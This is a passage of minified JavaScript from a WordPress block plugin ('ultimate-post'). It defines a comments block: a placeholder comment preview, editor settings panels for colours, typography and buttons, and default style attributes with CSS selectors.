velit"),(0,o.createElement)("button",{className:"ultp-reply-btn"},"Reply"),(0,o.createElement)("ul",{className:"ultp-reply-wrapper"},(0,o.createElement)("li",{className:"ultp-reply-content"},(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/builder/replay_icon.svg"}),(0,o.createElement)("div",{className:"ultp-reply-content-main"},(0,o.createElement)("div",{className:"ultp-comment-content-heading"},E&&(0,o.createElement)("img",{src:ultp_data.url+"assets/img/ultp-placeholder.jpg"}),(0,o.createElement)("div",{className:"ultp-comment-meta"},(0,o.createElement)("div",null," Richard Jackson"),C&&(0,o.createElement)("span",null," ",'July 19, 2021 at 3:45 PM"'," "))),(0,o.createElement)("div",{className:"ultp-comment-desc"},"Consequuntur magni dolores Eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit"),(0,o.createElement)("button",{className:"ultp-reply-btn"},"Reply"))),(0,o.createElement)("li",{className:"ultp-reply-content"},(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/builder/replay_icon.svg"}),(0,o.createElement)("div",{className:"ultp-reply-content-main"},(0,o.createElement)("div",{className:"ultp-comment-content-heading"},E&&(0,o.createElement)("img",{src:ultp_data.url+"assets/img/ultp-placeholder.jpg"}),(0,o.createElement)("div",{className:"ultp-comment-meta"},(0,o.createElement)("div",null,"Joan May"),C&&(0,o.createElement)("span",null," ",'July 19, 2021 at 3:45 PM"'," "))),(0,o.createElement)("div",{className:"ultp-comment-desc"},"Consequuntur magni dolores Eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit"),(0,o.createElement)("button",{className:"ultp-reply-btn"},"Reply"))))),(0,o.createElement)("li",null,(0,o.createElement)("div",{className:"ultp-comment-content-heading"},E&&(0,o.createElement)("img",{src:ultp_data.url+"assets/img/ultp-placeholder.jpg"}),(0,o.createElement)("div",{className:"ultp-comment-meta"},(0,o.createElement)("div",null,"Gary Bogart"),C&&(0,o.createElement)("span",null,"July 19, 2021 at 3:45 PM"))),(0,o.createElement)("div",{className:"ultp-comment-desc"},"Consequuntur magni dolores Eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit"),(0,o.createElement)("button",{className:"ultp-reply-btn"},"Reply"),(0,o.createElement)("ul",{className:"ultp-reply-wrapper"},(0,o.createElement)("li",{className:"ultp-reply-content"},(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/builder/replay_icon.svg"}),(0,o.createElement)("div",{className:"ultp-reply-content-main"},(0,o.createElement)("div",{className:"ultp-comment-content-heading"},(0,o.createElement)("img",{src:ultp_data.url+"assets/img/ultp-placeholder.jpg"}),(0,o.createElement)("div",{className:"ultp-comment-meta"},(0,o.createElement)("div",null,"Mario Whitted"),C&&(0,o.createElement)("span",null,"July 19, 2021 at 3:45 PM"))),(0,o.createElement)("div",{className:"ultp-comment-desc"},"Consequuntur magni dolores Eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit"),(0,o.createElement)("button",{className:"ultp-reply-btn"},"Reply"))))))),(0,o.createElement)("div",{className:`ultp-builder-comments ultp-comments-${v}`},(0,o.createElement)("div",{className:"ultp-comments-heading"},f&&(0,o.createElement)("div",{className:"ultp-comments-title"},h),(0,o.createElement)("span",{className:"ultp-comments-subtitle"},"Your email address will not be published. Required fields are marked *")),(0,o.createElement)("div",{className:"ultp-comment-form comment-form-comment"},(0,o.createElement)("div",{className:"ultp-comment-input ultp-field-control "},k&&(0,o.createElement)("label",null,P," ",(0,o.createElement)("span",null,"*")),(0,o.createElement)("textarea",{placeholder:U})),(0,o.createElement)("div",{className:"ultp-comment-name ultp-field-control "},k&&(0,o.createElement)("label",null," ",I," ",(0,o.createElement)("span",null,"*")),(0,o.createElement)("input",{type:"name"})),(0,o.createElement)("div",{className:"ultp-comment-email ultp-field-control "},k&&(0,o.createElement)("label",null,L," ",(0,o.createElement)("span",null,"*")),(0,o.createElement)("input",{type:"email"})),(0,o.createElement)("div",{className:"ultp-comment-website ultp-field-control "},k&&(0,o.createElement)("label",null,B," ",(0,o.createElement)("span",null,"*")),(0,o.createElement)("input",{type:"text"}))),S&&(0,o.createElement)("p",{className:"comment-form-cookies-consent"},(0,o.createElement)("input",{id:"wp-comment-cookies-consent",name:"wp-comment-cookies-consent",type:"checkbox",value:"yes"})," ",(0,o.createElement)("label",{htmlFor:"wp-comment-cookies-consent"},w)),(0,o.createElement)("button",{className:"ultp-comment-btn",id:"submit"},x)))))}},17655:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294),a=l(53049),i=l(92637);const{__}=wp.i18n,n=({store:e})=>(0,o.createElement)(o.Fragment,null,(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.T,{initialOpen:!0,title:"inline",include:[{data:{type:"layout",key:"layout",pro:!1,tab:!0,label:__("Select Advanced Layout","ultimate-post"),block:"related-posts",options:[{img:"assets/img/layouts/builder/comments/comment1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/builder/comments/comment2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/builder/comments/comment3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0}]}}],store:e}),(0,o.createElement)(a.T,{initialOpen:!1,title:__("Comments Form Heading","ultimate-post"),depend:"replyHeading",include:[{data:{type:"text",key:"leaveRepText",label:__("Leave a reply text","ultimate-post")}},{data:{type:"color",key:"HeadingColor",label:__("Heading Color","ultimate-post")}},{data:{type:"typography",key:"HeadingTypo",label:__("Heading Typography","ultimate-post")}},{data:{type:"color",key:"subHeadingColor",label:__("Sub Heading Color","ultimate-post")}},{data:{type:"range",key:"headingSpace",min:1,max:150,step:1,unit:!0,responsive:!0,label:__("Heading Spacing","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{initialOpen:!1,title:__("Comments Form Input","ultimate-post"),include:[{data:{type:"separator",label:__("Input Style","ultimate-post")}},{data:{type:"text",key:"inputPlaceHolder",label:__("Textarea Placeholder","ultimate-post")}},{data:{type:"color",key:"inputPlaceValueColor",label:__("Placeholder Color","ultimate-post")}},{data:{type:"color",key:"inputValueColor",label:__("Input Color","ultimate-post")}},{data:{type:"color",key:"inputValueBg",label:__("Input Background Color","ultimate-post")}},{data:{type:"typography",key:"inputValueTypo",label:__("Input Typography","ultimate-post")}},{data:{type:"dimension",key:"inputValuePad",step:1,unit:!0,responsive:!0,label:__("Input Padding","ultimate-post")}},{data:{type:"border",key:"inputBorder",label:__("Input Border","ultimate-post")}},{data:{type:"border",key:"inputHovBorder",label:__("Input Hover Border","ultimate-post")}},{data:{type:"dimension",key:"inputRadius",step:1,unit:!0,responsive:!0,label:__("Input Border Radius","ultimate-post")}},{data:{type:"dimension",key:"inputHovRadius",step:1,unit:!0,label:__("Input Hover Radius","ultimate-post")}},{data:{type:"range",key:"inputSpacing",min:1,max:300,unit:!0,responsive:!0,step:1,label:__("Spacing","ultimate-post")}},{data:{type:"separator",label:__("Label Style","ultimate-post")}},{data:{type:"toggle",key:"inputLabel",label:__("Input Label","ultimate-post")}},{data:{type:"text",key:"cmntInputText",label:__("Input Label","ultimate-post")}},{data:{type:"text",key:"nameInputText",label:__("Input Label","ultimate-post")}},{data:{type:"text",key:"emailInputText",label:__("Input Label","ultimate-post")}},{data:{type:"text",key:"webInputText",label:__("Input Label","ultimate-post")}},{data:{type:"color",key:"inputLabelColor",label:__("Label Color","ultimate-post")}},{data:{type:"typography",key:"inputLabelTypo",label:__("Label Typography","ultimate-post")}},{data:{type:"toggle",key:"disableWebUrl",label:__("Disable Web URL","ultimate-post")}},{data:{type:"toggle",key:"cookiesEnable",label:__("Cookies Enable","ultimate-post")}},{data:{type:"text",key:"cookiesText",label:__("Cookies Text","ultimate-post")}},{data:{type:"color",key:"cookiesColor",label:__("Cookies Text Color","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{initialOpen:!1,title:__("Submit Button","ultimate-post"),include:[{data:{type:"text",key:"subBtnText",label:__("Submit Button Text","ultimate-post")}},{data:{type:"typography",key:"subBtnTypo",label:__("Text Typography","ultimate-post")}},{data:{type:"tab",key:"submitButton",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"subBtnColor",label:__("Text Color","ultimate-post")},{type:"color2",key:"subBtnBg",label:__("Background Color","ultimate-post")},{type:"border",key:"subBtnBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"subBtnRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"subBtnHovColor",label:__("Text Hover Color","ultimate-post")},{type:"color2",key:"subBtnHovBg",label:__("Background Hover Color","ultimate-post")},{type:"border",key:"subBtnHovBorder",label:__("Hover Border","ultimate-post")},{type:"dimension",key:"subBtnHovRadius",step:1,unit:!0,responsive:!0,label:__("Hover Radius","ultimate-post")}]}]}},{data:{type:"dimension",key:"subBtnPad",step:1,unit:!0,responsive:!0,label:__("Button Padding","ultimate-post")}},{data:{type:"range",key:"subBtnSpace",min:1,max:300,unit:!0,responsive:!0,step:1,label:__("Spacing","ultimate-post")}},{data:{type:"alignment",key:"subBtnAlign",disableJustify:!0,label:__("Alignment","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{initialOpen:!0,title:__("Comments & Reply","ultimate-post"),include:[{data:{type:"separator",label:__("Commenter Name Style","ultimate-post")}},{data:{type:"color",key:"authColor",label:__("Name Color","ultimate-post")}},{data:{type:"color",key:"authHovColor",label:__("Name Hover Color","ultimate-post")}},{data:{type:"typography",key:"authorTypo",label:__("Typography","ultimate-post")}},{data:{type:"dimension",key:"commentSpace",step:1,unit:!0,responsive:!0,label:__("Spacing","ultimate-post")}},{data:{type:"text",key:"replyText",label:__("Comments Text","ultimate-post")}},{data:{type:"toggle",key:"commentCount",label:__("Comment Count","ultimate-post")}},{data:{type:"color",key:"commentCountColor",label:__("Text Color","ultimate-post")}},{data:{type:"typography",key:"commentCountTypo",label:__("Text Typography","ultimate-post")}},{data:{type:"range",key:"commentCountSpace",min:1,max:300,unit:!0,responsive:!0,step:1,label:__("Comment Count Spacing","ultimate-post")}},{data:{type:"separator",label:__("Button Style","ultimate-post")}},{data:{type:"typography",key:"replyBtnTypo",label:__("Button Typography","ultimate-post")}},{data:{type:"tab",key:"replyButton",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"replyBtnColor",label:__("Reply Button","ultimate-post")},{type:"color2",key:"replyBtnBg",label:__("Background","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"replyBtnHovColor",label:__("Reply Button","ultimate-post")},{type:"color2",key:"replyBtnBgHov",label:__("Background","ultimate-post")}]}]}},{data:{type:"border",key:"replyBtnBorder",label:__("Border","ultimate-post")}},{data:{type:"dimension",key:"replyBtnRadius",step:1,unit:!0,responsive:!0,label:__("Radius","ultimate-post")}},{data:{type:"dimension",key:"replyBtnPad",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}},{data:{type:"range",key:"replyBtnSpace",min:1,max:300,responsive:!0,step:1,unit:!0,label:__("Reply Button Spacing","ultimate-post")}},{data:{type:"separator",label:__("Commenter Meta","ultimate-post")}},{data:{type:"range",key:"authMetaSpace",min:1,max:300,unit:!0,responsive:!0,step:1,label:__("Meta Spacing","ultimate-post")}},{data:{type:"toggle",key:"authMeta",label:__("Commenter Meta","ultimate-post")}},{data:{type:"color",key:"authMetaColor",label:__("Meta Color","ultimate-post")}},{data:{type:"color",key:"authMetaHovColor",label:__("Meta Color Hover","ultimate-post")}},{data:{type:"typography",key:"authMetaTypo",label:__("Meta Typography","ultimate-post")}},{data:{type:"separator",label:__("Commenter Image","ultimate-post")}},{data:{type:"toggle",key:"authImg",label:__("Commenter Image","ultimate-post")}},{data:{type:"dimension",key:"authImgRadius",step:1,unit:!0,responsive:!0,label:__("Image Radius","ultimate-post")}},{data:{type:"separator",label:__("Reply Style","ultimate-post")}},{data:{type:"color",key:"replyColor",label:__("Reply Color","ultimate-post")}},{data:{type:"color",key:"replyHovColor",label:__("Reply Hover Color","ultimate-post")}},{data:{type:"typography",key:"replyTypo",label:__("Reply Typography","ultimate-post")}},{data:{type:"separator",label:__("Reply Separator","ultimate-post")}},{data:{type:"toggle",key:"replySeparator",label:__("Reply Separator","ultimate-post")}},{data:{type:"color",key:"replySepColor",label:__("Separator Color","ultimate-post")}},{data:{type:"range",key:"replySepSpace",min:1,max:300,unit:!0,responsive:!0,step:1,label:__("Separator Space","ultimate-post")}},{data:{type:"separator",label:__("Replay Cancel Style","ultimate-post")}},{data:{type:"color",key:"replyCancelColor",label:__("Replay Cancel Color","ultimate-post")}},{data:{type:"color",key:"replyCancelHoverColor",label:__("Replay Cancel Hover Color","ultimate-post")}}],store:e})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{store:e}),(0,o.createElement)(a.Mg,{pro:!0,store:e}),(0,o.createElement)(a.iv,{store:e}))))},34701:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1"},replyHeading:{type:"boolean",default:!0},leaveRepText:{type:"string",default:"Leave a Reply",style:[{depends:[{key:"replyHeading",condition:"==",value:!0}]}]},HeadingColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"replyHeading",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comments-title, \n        {{ULTP}} .comment-reply-title { color:{{HeadingColor}} }"}]},HeadingTypo:{type:"object",default:{openTypography:1,size:{lg:24,unit:"px"},height:{lg:26,unit:"px"}},style:[{depends:[{key:"replyHeading",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comments-title, \n        {{ULTP}} .comment-reply-title, \n        {{ULTP}} .comment-reply-title a, \n        {{ULTP}} #reply-title"}]},subHeadingColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"replyHeading",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comments-subtitle,\n          {{ULTP}} .logged-in-as, \n          {{ULTP}} .comment-notes { color:{{subHeadingColor}} }"}]},headingSpace:{type:"object",default:{lg:"5",unit:"px"},style:[{depends:[{key:"replyHeading",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comments-title { margin-bottom:{{headingSpace}} !important; }"}]},inputPlaceHolder:{type:"string",default:"Express your thoughts, idea or write a feedback by clicking here & start an awesome comment"},inputPlaceValueColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{selector:"{{ULTP}} .ultp-comment-form ::placeholder { color:{{inputPlaceValueColor}} }"}]},inputValueColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{selector:"{{ULTP}} .ultp-comment-form input,\n          {{ULTP}} .ultp-comment-form textarea { color:{{inputValueColor}} }"}]},inputValueBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{selector:"{{ULTP}} .ultp-comment-form input, \n          {{ULTP}} .ultp-comment-form textarea {background-color:{{inputValueBg}}}"}]},inputValueTypo:{type:"object",default:{openTypography:1,size:{lg:15,unit:"px"},height:{lg:20,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-comment-form input, \n          {{ULTP}} .ultp-comment-form textarea"}]},inputValuePad:{type:"object",default:{lg:"15",unit:"px"},style:[{selector:"{{ULTP}} .ultp-comment-form input, \n          {{ULTP}} .ultp-comment-form textarea { padding:{{inputValuePad}} }"}]},inputBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"#e2e2e2",type:"solid"},style:[{selector:"{{ULTP}} .ultp-comment-form input, \n          {{ULTP}} .ultp-comment-input textarea"}]},inputHovBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"#777",type:"solid"},style:[{selector:"{{ULTP}} .ultp-comment-form input:hover,{{ULTP}} .ultp-comment-form input:focus,{{ULTP}} .ultp-comment-form textarea:hover, \n          {{ULTP}} .ultp-comment-form textarea:focus"}]},inputRadius:{type:"object",default:{lg:"0",unit:"px"},style:[{selector:"{{ULTP}} .ultp-comment-form input, \n          {{ULTP}} .ultp-comment-form textarea{ border-radius:{{inputRadius}} }"}]},inputHovRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-comment-form input:hover, \n          {{ULTP}} .ultp-comment-form textarea:hover{ border-radius:{{inputHovRadius}} }"}]},inputSpacing:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"inputLabel",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout1"}],selector:"{{ULTP}} .ultp-comment-form > div > label, \n          {{ULTP}} .ultp-comment-form div > p, \n          {{ULTP}} .ultp-comment-input,{{ULTP}} .ultp-comment-form > p,{{ULTP}} .ultp-comment-form > input, .oceanwp-theme \n          {{ULTP}} .comment-form-author,  .oceanwp-theme \n          {{ULTP}} .comment-form-email, .oceanwp-theme \n          {{ULTP}} .comment-form-url { margin:{{inputSpacing}} 0px 0px !important;}"},{depends:[{key:"inputLabel",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout2"}],selector:"{{ULTP}} .ultp-comment-form > div > label, \n          {{ULTP}} .ultp-comment-form div > p, \n          {{ULTP}} .ultp-comment-input,{{ULTP}} .ultp-comment-form > p, \n          {{ULTP}} .ultp-comment-form > input { margin:{{inputSpacing}} 0px 0px !important} ;"},{depends:[{key:"inputLabel",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout3"}],selector:"{{ULTP}} .ultp-comment-form > div > label, \n          {{ULTP}} .ultp-comment-form div > p, \n          {{ULTP}} .ultp-comment-input, \n          {{ULTP}} .ultp-comment-form > p, \n          {{ULTP}} .ultp-comment-form > input { margin:{{inputSpacing}} 0px 0px !important;}"}]},inputLabel:{type:"boolean",default:!0},cmntInputText:{type:"string",default:"Comment's",style:[{depends:[{key:"inputLabel",condition:"==",value:!0}]}]},nameInputText:{type:"string",default:"Name",style:[{depends:[{key:"inputLabel",condition:"==",value:!0}]}]},emailInputText:{type:"string",default:"Email",style:[{depends:[{key:"inputLabel",condition:"==",value:!0}]}]},webInputText:{type:"string",default:"Website Url",style:[{depends:[{key:"inputLabel",condition:"==",value:!0},{key:"disableWebUrl",condition:"==",value:!1}]}]},inputLabelColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"inputLabel",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-form label { color:{{inputLabelColor}} }"}]},inputLabelTypo:{type:"object",default:{openTypography:1,size:{lg:16,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",transform:"",family:"",weight:""},style:[{depends:[{key:"inputLabel",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-form label"}]},disableWebUrl:{type:"boolean",default:!1,style:[{depends:[{key:"disableWebUrl",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-website, {{ULTP}} .comment-form-url { display: none !important; }"},{depends:[{key:"disableWebUrl",condition:"==",value:!1}]}]},cookiesEnable:{type:"boolean",default:!0},cookiesText:{type:"string",default:"Save my name, email, and website in this browser for the next time I comment.",style:[{depends:[{key:"cookiesEnable",condition:"==",value:!0}]}]},cookiesColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"cookiesEnable",condition:"==",value:!0}],selector:"{{ULTP}} .comment-form-cookies-consent label { color:{{cookiesColor}} }"}]},subBtnText:{type:"string",default:"Post Comment"},subBtnTypo:{type:"object",default:{openTypography:1,size:{lg:15,unit:"px"},height:{lg:20,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-comment-btn, \n          {{ULTP}} .form-submit > input#submit"}]},submitButton:{type:"string",default:"normal"},subBtnColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-comment-btn,{{ULTP}} .form-submit > input#submit { color:{{subBtnColor}} }"}]},subBtnBg:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Primary_color)"},style:[{selector:"{{ULTP}} .ultp-comment-btn, \n          {{ULTP}} .form-submit > input#submit"}]},subBtnBorder:{type:"object",default:{openBorder:1,width:{top:0,right:0,bottom:0,left:0},color:"var(--postx_preset_Primary_color)",type:"solid"},style:[{selector:"{{ULTP}} .ultp-comment-btn, \n          {{ULTP}} .form-submit > input#submit"}]},subBtnRadius:{type:"object",default:{top:"3",right:"3",bottom:"3",left:"3",unit:"px"},style:[{selector:"{{ULTP}} .ultp-comment-btn, \n          {{ULTP}} .form-submit > input#submit { border-radius:{{subBtnRadius}} }"}]},subBtnHovColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-comment-btn:hover, \n          {{ULTP}} .form-submit > input#submit:hover { color:{{subBtnHovColor}} }"}]},subBtnHovBg:{type:"object",default:{openColor:0,type:"color",color:"var(--postx_preset_Secondary_color)"},style:[{selector:"{{ULTP}} .ultp-comment-btn:hover, \n          {{ULTP}} .form-submit > input#submit:hover"}]},subBtnHovBorder:{type:"object",default:{openBorder:1,width:{top:0,right:0,bottom:0,left:0},color:"#151515",type:"solid"},style:[{selector:"{{ULTP}} .ultp-comment-btn:hover, \n          {{ULTP}} .form-submit > input#submit:hover"}]},subBtnHovRadius:{type:"object",default:{top:"3",right:"3",bottom:"3",left:"3",unit:"px"},style:[{selector:"{{ULTP}} .ultp-comment-btn:hover, \n          {{ULTP}} .form-submit > input#submit:hover { border-radius:{{subBtnHovRadius}} }"}]},subBtnPad:{type:"object",default:{lg:"10",unit:"px"},style:[{selector:"{{ULTP}} .ultp-comment-btn, \n          {{ULTP}} .form-submit > input#submit { padding:{{subBtnPad}} }"}]},subBtnSpace:{type:"object",default:{lg:"20",unit:"px"},style:[{selector:"{{ULTP}} .ultp-comment-btn, \n          {{ULTP}} .form-submit > input#submit { margin:{{subBtnSpace}} 0px 0px}"}]},subBtnAlign:{type:"string",default:"left",style:[{depends:[{key:"subBtnAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-comment-btn, \n          {{ULTP}} .form-submit > input#submit, \n          {{ULTP}} .ultp-comment-btn, \n          {{ULTP}} .form-submit { display: block !important; margin-right: auto !important; }"},{depends:[{key:"subBtnAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-comment-btn, \n          {{ULTP}} .form-submit > input#submit, \n          {{ULTP}} .ultp-comment-btn, \n          {{ULTP}} .form-submit { display: block !important; margin-left: auto !important; margin-right: auto !important}"},{depends:[{key:"subBtnAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-comment-btn, \n          {{ULTP}} .form-submit > input#submit, \n          {{ULTP}} .ultp-comment-btn, \n          {{ULTP}} .form-submit { display: block !important; margin-left:auto !important;}"}]},authColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{selector:"{{ULTP}} .ultp-comment-meta div, \n          {{ULTP}} .comment-author a.url,{{ULTP}} .comment-author .fn {color:{{authColor}} }"}]},authHovColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-comment-meta div:hover,\n          {{ULTP}} .comment-author a.url:hover, \n          {{ULTP}} .comment-author b:hover {color: {{authHovColor}} }"}]},authorTypo:{type:"object",default:{openTypography:1,size:{lg:18,unit:"px"},height:{lg:25,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-comment-meta div ,\n          {{ULTP}} .comment-author a.url, \n          {{ULTP}} .comment-author b"}]},commentSpace:{type:"object",default:{lg:{top:"15",bottom:"0",left:"30",right:"0",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-reply-wrapper, \n          {{ULTP}} .children { margin: {{commentSpace}} }"}]},replyText:{type:"string",default:"Comments Text"},commentCount:{type:"boolean",default:!0},commentCountColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-comment-reply-heading {color:{{commentCountColor}} }"}]},commentCountTypo:{type:"object",default:{openTypography:1,size:{lg:30,unit:"px"},height:{lg:28,unit:"px"},weight:"600"},style:[{selector:"{{ULTP}} .ultp-comment-reply-heading"}]},commentCountSpace:{type:"object",default:{lg:"30",unit:"px"},style:[{selector:"{{ULTP}} .ultp-comment-reply-heading { margin:0px 0px {{commentCountSpace}} }"}]},authMetaSpace:{type:"object",default:{lg:"7",unit:"px"},style:[{selector:"{{ULTP}} .ultp-comment-content-heading, \n          {{ULTP}} .comment-meta { margin:0px 0px {{authMetaSpace}} }"}]},replyButton:{type:"string",default:"normal"},replyBtnTypo:{type:"object",default:{openTypography:1,size:{lg:15,unit:"px"},height:{lg:20,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-reply-btn, \n          {{ULTP}} .comment-reply-link, \n          {{ULTP}} .comment-body .reply a"}]},replyBtnColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-reply-btn, \n          {{ULTP}} .comment-reply-link, \n          {{ULTP}} .comment-body .reply a {color: {{replyBtnColor}} }"}]},replyBtnBg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5"},style:[{selector:"{{ULTP}} .ultp-reply-btn, \n          {{ULTP}} .comment-reply-link, \n          {{ULTP}} .comment-body .reply a"}]},replyBtnHovColor:{type:"string",default:"var(--postx_preset_Secondary_color)",style:[{selector:"{{ULTP}} .ultp-reply-btn:hover, \n          {{ULTP}} .comment-body .reply a:hover, \n          {{ULTP}} .comment-reply-link:hover {color: {{replyBtnHovColor}} }"}]},replyBtnBgHov:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5"},style:[{selector:"{{ULTP}} .ultp-reply-btn:hover, \n          {{ULTP}} .comment-reply-link:hover, \n          {{ULTP}} .comment-body .reply a:hover"}]},replyBtnBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-reply-btn, \n          {{ULTP}} .comment-reply-link, \n          {{ULTP}} .comment-body .reply a"}]},replyBtnRadius:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-reply-btn, \n          {{ULTP}} .comment-reply-link, \n          {{ULTP}} .comment-body .reply a { border-radius:{{replyBtnRadius}}; }"}]},replyBtnPad:{type:"object",default:{lg:{top:"5",bottom:"5",left:"5",right:"5",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-reply-btn, \n          {{ULTP}} .comment-reply-link, \n          {{ULTP}} .comment-body .reply a { padding:{{replyBtnPad}}; }"}]},replyBtnSpace:{type:"object",default:{lg:"7",unit:"px"},style:[{selector:"{{ULTP}} .ultp-reply-btn, \n          {{ULTP}} .comment-reply-link, \n          {{ULTP}} .comment-body .reply a { margin: {{replyBtnSpace}} 0px}"}]},authMeta:{type:"boolean",default:!0,style:[{depends:[{key:"authMeta",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-meta span, \n          {{ULTP}} .comment-metadata , \n          {{ULTP}} .comment-meta {display:block}"},{depends:[{key:"authMeta",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-comment-meta span, \n          {{ULTP}} .comment-metadata , \n          {{ULTP}} .comment-meta {display:none}"}]},authMetaColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"authMeta",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-meta span , \n          {{ULTP}} .comment-metadata a ,\n          {{ULTP}} .comment-meta a { color:{{authMetaColor}} }"}]},authMetaHovColor:{type:"string",default:"",style:[{depends:[{key:"authMeta",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-meta span:hover , \n          {{ULTP}} .comment-metadata a:hover ,\n          {{ULTP}} .comment-meta a:hover { color:{{authMetaHovColor}} }"}]},authMetaTypo:{type:"object",default:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:20,unit:"px"}},style:[{depends:[{key:"authMeta",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-meta span, \n          {{ULTP}} .comment-metadata a, \n          {{ULTP}} .comment-meta a"}]},authImg:{type:"boolean",default:!0,style:[{depends:[{key:"authImg",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-wrapper .ultp-comment-content-heading > img,\n          {{ULTP}} .comment-author img {display: inline }"},{depends:[{key:"authImg",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-comment-content-heading > img,\n          {{ULTP}} .comment-author img {display: none }"}]},authImgRadius:{type:"object",default:{lg:"50",unit:"px"},style:[{depends:[{key:"authImg",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-content-heading > img,\n          {{ULTP}} .comment-author img {border-radius: {{authImgRadius}} }"}]},replyColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{selector:"{{ULTP}} .ultp-comment-desc,\n          {{ULTP}} .comment-content, \n          {{ULTP}} .comment-body .reply ,\n          {{ULTP}} .comment-body > p { color:{{replyColor}} }"}]},replyHovColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-comment-desc:hover, \n          {{ULTP}} .comment-content:hover, \n          {{ULTP}} .comment-body .reply:hover,\n          {{ULTP}} .comment-body > p:hover {color: {{replyHovColor}} }"}]},replyTypo:{type:"object",default:{openTypography:1,size:{lg:15,unit:"px"},height:{lg:20,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-comment-desc, \n          {{ULTP}} .comment-content, \n          